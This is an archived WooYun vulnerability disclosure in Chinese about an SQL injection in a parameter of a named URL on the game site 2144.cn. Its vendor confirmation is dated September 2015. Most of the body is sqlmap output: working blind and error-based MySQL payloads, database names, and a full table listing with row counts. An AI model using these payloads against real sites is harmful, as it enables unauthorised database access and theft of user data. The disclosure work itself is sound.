乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-15: 细节已通知厂商并且等待厂商处理中 2015-09-16: 厂商已经确认,细节仅向厂商公开 2015-09-26: 细节向核心白帽子及相关领域专家公开 2015-10-06: 细节向普通白帽子公开 2015-10-16: 细节向实习白帽子公开 2015-10-31: 细节向公众公开
2144游戏网(2144.cn)创建于2006年,是目前国内最受欢迎的小游戏网站。八年来,我们一直秉承着服务用户、快乐至上的发展理念,致力提供最丰富、最优先的游戏内容。发展至今,2144游戏网已经成为一个涵盖小游戏、网页游戏、手机游戏、游戏资讯等多个领域的综合性休闲游戏平台。目前,2144游戏网已经拥有近1亿的注册用户,每天都有超过500万玩家一起在2144玩游戏,并且这些数据,每天都在以令人惊喜的速度不断刷新。
注入点
http://act.2144.cn/week/?id=6
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=6 AND 6403=6403 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=6 AND (SELECT 6081 FROM(SELECT COUNT(*),CONCAT(0x717a707a71,(SELECT (ELT(6081=6081,1))),0x716a706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)---back-end DBMS: MySQL 5.0available databases [3]:[*] act_2144_cn[*] information_schema[*] testsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=6 AND 6403=6403 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=6 AND (SELECT 6081 FROM(SELECT COUNT(*),CONCAT(0x717a707a71,(SELECT (ELT(6081=6081,1))),0x716a706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)---back-end DBMS: MySQL 5.0Database: act_2144_cn[176 tables]+-------------------------+| act_admin || act_code || act_diy_same || act_diy_user || act_editor || act_element || act_info || act_photo || act_tp || act_user || act_vote || act_week || act_week_category || act_week_element || android_app_bh_libao || aoqi_bind || aoqi_chance || aoqi_invite || aoqi_log || aoqi_reward || aoqi_signin || aoqi_user || aoyun_ip || aoyun_vote || baba2_ip || baba2_vote || bbjq_ip || bbjq_vote || bbjx_ip || bbjx_vote || bkhy_code || bkhy_ip || common_libao || core_category || core_message || core_support || core_xmas_code || core_xmas_exchange || core_xmas_user || csbh_gift || csbh_gift_1 || csbh_gift_3 || csbh_user || csbh_user_1 || csbh_user_3 || csbhsjb_ip || csbhsjb_vote || csbhsqdzz || cwzw_libao || cyhx_ip || cyhx_vote || dkdb2_code || dkdb2_ip || dkdb_code || dkdb_ip || dlzs || dlzs_ip || dlzs_name || duanwu_2014_hao123_ip || duanwu_2014_hao123_vote || duanwu_2014_ip || duanwu_2014_vote || duanwu_ip || duanwu_vote || dyyx_ip || dyyx_vote || fnxn_ip || fnxn_vote || game_score || game_score_month || gfp_answerlog || gfp_vote || gq2011 || gzbs_ip || gzbs_vote || haqi_invite || haqi_user || hdl_md_list || hdl_users || hhz_ip || hhz_vote || jjxf || jlw2014_bind || jlw2014_chance || jlw2014_reward || jlw2014_signin || jlw_log || jlw_user || kaixue_ip || kaixue_vote || kjys_ip || kjys_vote || kkml3 || kkml3_ip || klns_ip || klns_vote || kxbb_ip || kxbb_vote || liudi || liudi_user || lol_act_ip || lol_act_vote || mole || mole_mimi || mqmm_ip || mqmm_vote || music || music2 || music_bak || mxh1 || mxh1_ip || mxh2 || mxh2_ip || mxh3 || mxh3_ip || mxh4 || mxh4_ip || mxh5 || mxh5_ip || mxxgs_code || mzfs_ip || mzfs_vote || newyear2012 || newyear2012_stat || newyear2012_visit || qx2015 || qx2015_userinfo || rexue_bind_2014 || rexue_reward_2014 || scheme_info || scheme_user || seer2012_ip || seer2012_signin || seer2012_vote || seer2013_gifts || seer2013_logs || seer2013_userinfo || seer2013_vote || seer2014_gifts || seer2014_logs || seer2014_mibi_dy || seer2014_userinfo || seer51 || seer51_ip || seer51_num || sexz_ip || sexz_vote || shaun_ip || shaun_vote || t_admin || t_operate || tfboy_ip || tfboy_vote || tuijian_sum || tuijian_user || uchome_act_kjys || web_bofangye || web_survey || worldcpu_2014_ip || worldcpu_2014_vote || wxgq_code || xiaozhi_ip || xiaozhi_vote || xw || xyj_ip || xyj_vote || zombie_ip || zombie_vote || zp_exchange_code || zp_gift_info || zp_gift_list || zp_lottery_info || zslm_code || zslm_survey || zuinan_ip || zuinan_vote |+-------------------------+Database: act_2144_cn+-------------------------+---------+| Table | Entries |+-------------------------+---------+| tfboy_ip | 6043089 || kjys_ip | 3588788 || bbjx_ip | 2553712 || kxbb_ip | 1796136 || baba2_ip | 1601660 || fnxn_ip | 1338184 || bbjq_ip | 957779 || gzbs_ip | 555666 || xyj_ip | 520118 || act_code | 270000 || csbh_gift | 200000 || cyhx_ip | 190424 || shaun_ip | 183099 || sexz_ip | 177876 || zombie_ip | 175523 || mzfs_ip | 174881 || dlzs | 145000 || klns_ip | 120392 || dlzs_name | 113933 || dlzs_ip | 110966 || mole | 100000 || game_score | 80224 || game_score_month | 77080 || hhz_ip | 72434 || zuinan_ip | 71143 || mqmm_ip | 56791 || act_user | 54553 || mxh1_ip | 49414 || common_libao | 44993 || mole_mimi | 41235 || jlw2014_reward | 40200 || csbh_gift_3 | 40000 || mxh3_ip | 38875 || newyear2012_visit | 35247 || csbh_gift_1 | 31013 || aoqi_reward | 30328 || seer2014_gifts | 30200 || dkdb2_code | 30000 || seer2014_logs | 29156 || seer2012_signin | 28560 || mxh2_ip | 21259 || rexue_reward_2014 | 20510 || seer2013_gifts | 20090 || bkhy_code | 20000 || android_app_bh_libao | 19998 || liudi | 18000 || dyyx_ip | 17611 || mxh4_ip | 17608 || dkdb_ip | 17446 || newyear2012 | 16294 || duanwu_2014_ip | 16140 || duanwu_ip | 14100 || jjxf | 14000 || worldcpu_2014_ip | 13112 || csbh_user_1 | 12748 || dkdb2_ip | 12499 || seer51 | 12182 || mxh5_ip | 12022 || seer2014_userinfo | 11103 || dkdb_code | 10350 || mxxgs_code | 10000 || uchome_act_kjys | 10000 || core_message | 8895 || zslm_survey | 8819 || csbh_user_3 | 8674 || t_operate | 6973 || zp_exchange_code | 6318 || jlw2014_signin | 6044 || csbh_user | 5808 || seer51_ip | 5727 || kkml3_ip | 5652 || kaixue_ip | 5322 || aoqi_signin | 5033 || csbhsqdzz | 4999 || seer2012_ip | 4227 || web_survey | 4175 || aoqi_log | 4095 || newyear2012_stat | 3918 || aoqi_chance | 3452 || jlw2014_chance | 3352 || jlw_log | 3344 || core_xmas_code | 3306 || jlw2014_bind | 3269 || aoqi_bind | 3172 || gfp_answerlog | 3152 || act_diy_user | 3027 || aoyun_ip | 2371 || kkml3 | 2232 || xiaozhi_ip | 2177 || seer2013_userinfo | 2118 || act_week_element | 2048 || cwzw_libao | 1500 || seer2013_logs | 1485 || bkhy_ip | 1394 || haqi_user | 1390 || core_xmas_user | 1260 || rexue_bind_2014 | 990 || wxgq_code | 942 || jlw_user | 844 || csbhsjb_ip | 834 || zslm_code | 600 || qx2015 | 542 || act_editor | 495 || lol_act_ip | 451 || liudi_user | 405 || act_week_category | 346 || act_photo | 330 || act_diy_same | 303 || scheme_info | 266 || tuijian_user | 187 || hdl_md_list | 105 || act_element | 100 || aoqi_invite | 99 || haqi_invite | 72 || web_bofangye | 70 || music | 68 || music2 | 68 || music_bak | 59 || core_support | 53 || xw | 50 || worldcpu_2014_vote | 32 || act_week | 31 || seer2014_mibi_dy | 27 || core_xmas_exchange | 23 || mxh3 | 17 || bbjx_vote | 16 || dyyx_vote | 16 || hhz_vote | 16 || kjys_vote | 16 || mqmm_vote | 16 || mxh2 | 16 || mzfs_vote | 16 || seer2012_vote | 16 || zuinan_vote | 16 || qx2015_userinfo | 15 || mxh1 | 14 || xyj_vote | 14 || mxh4 | 13 || mxh5 | 13 || t_admin | 13 || tuijian_sum | 13 || act_vote | 12 || scheme_user | 12 || sexz_vote | 12 || tfboy_vote | 12 || act_tp | 10 || kxbb_vote | 10 || act_info | 9 || bbjq_vote | 8 || csbhsjb_vote | 8 || gq2011 | 8 || shaun_vote | 8 || zp_gift_info | 8 || act_admin | 7 || kaixue_vote | 7 || aoyun_vote | 6 || gzbs_vote | 6 || baba2_vote | 5 || duanwu_vote | 5 || klns_vote | 5 || xiaozhi_vote | 5 || duanwu_2014_hao123_ip | 4 || lol_act_vote | 4 || duanwu_2014_hao123_vote | 3 || zp_lottery_info | 3 || cyhx_vote | 2 || duanwu_2014_vote | 2 || fnxn_vote | 2 || gfp_vote | 2 || seer2013_vote | 2 || seer51_num | 2 || zombie_vote | 2 |+-------------------------+---------+
如上
- -
危害等级:中
漏洞Rank:7
确认时间:2015-09-16 14:02
感谢您对2144安全工作的支持
暂无
